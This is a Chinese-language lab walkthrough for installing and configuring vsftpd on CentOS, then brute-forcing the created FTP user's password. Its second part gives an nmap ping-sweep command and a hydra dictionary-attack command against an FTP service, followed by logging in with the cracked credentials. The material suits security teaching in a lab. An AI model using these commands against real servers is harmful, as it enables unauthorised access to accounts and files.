Linux5 ftp服务相关(包括ftp用户建立及ftp用户密码破解)
一:ftp服务的开启和相关设置
1.打开虚拟机linux系统,登陆默认用户root,密码为安装linux系统时自设。
2.因为是在机房环境,我修改了ip地址和物理地址。
3.安装ftp服务用工具,启动ftp服务。输入以下命令:
cd ..(退出到根目录,此命令为到上一级目录)
cd media(进入指定文件夹)
mkdir cdrom (创建cdrom文件夹)
ls (显示文件夹内容)
cd ..
mount /dev/cdrom /media/cdrom/ (光盘镜像文件的挂接)
cd media
cd cdrom
ls
cd CentOS
ls
find /media/cdrom/CentOS/ -name *vsftpd*(查询)
rpm –ivh vsftpd……(输入vsftpd后tab可显示全称,安装)
service vsftpd start (启动ftp服务)
4.防火墙设置
此处,我设置为关闭防火墙
输入setup
5. 配置vstp服务器
vim /etc/vsftpd/vsftpd.conf
修改/etc/vsftpd/vsftpd.conf
将底下三行
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
改为
chroot_list_enable=YES
# (default follows)
chroot_list_file=/etc/vsftpd/chroot_list
(在显示界面,输入“/”,后接内容可进行查找,按“i”进入编辑模式,“esc”退出编辑模式,“:q!”强制退出不保存,“:wq”退出并保存)
6.增加ftp用户及相关设置
增加用户ftpuser,指向目录/home/ ftpuser,禁止登录SSH权限。
useradd -d /home/ ftpuser -g ftp -s /sbin/nologin ftpuser
设置用户口令
passwd ftpuser
编辑文件chroot_list:
vi /etc/vsftpd/chroot_list
内容为ftp用户名,每个用户占一行,如:
ftpuser
peter
john
7.重启ftp服务
service vsftpd restart
二、ftp用户密码的破解及登录
8.cmdd界面下使用nmap命令(需要安装nmap)
如nmap –sP 10.0.100-120.*,意思为查找10.0.100.0——10.0.200.255网段的ip地址
9.破解ftp用户密码
使用hydra-7.6,需要下载密码字典生成字典
cmd下输入命令(进入hydra安装文件夹)
hydra.exe –l ftpuser –P d:/1.txt 10.0.100.74 ftp(ftpuser为要破解ftp用户名,1.txt为密码字典文件,ftp为服务名)
然后任意打开我的电脑或者ie浏览器,输入如ftp://ftpuser@10.0.30.74,之后在弹出的窗口输入密码,即可用该用户名进入ftp,能够上传下载文件。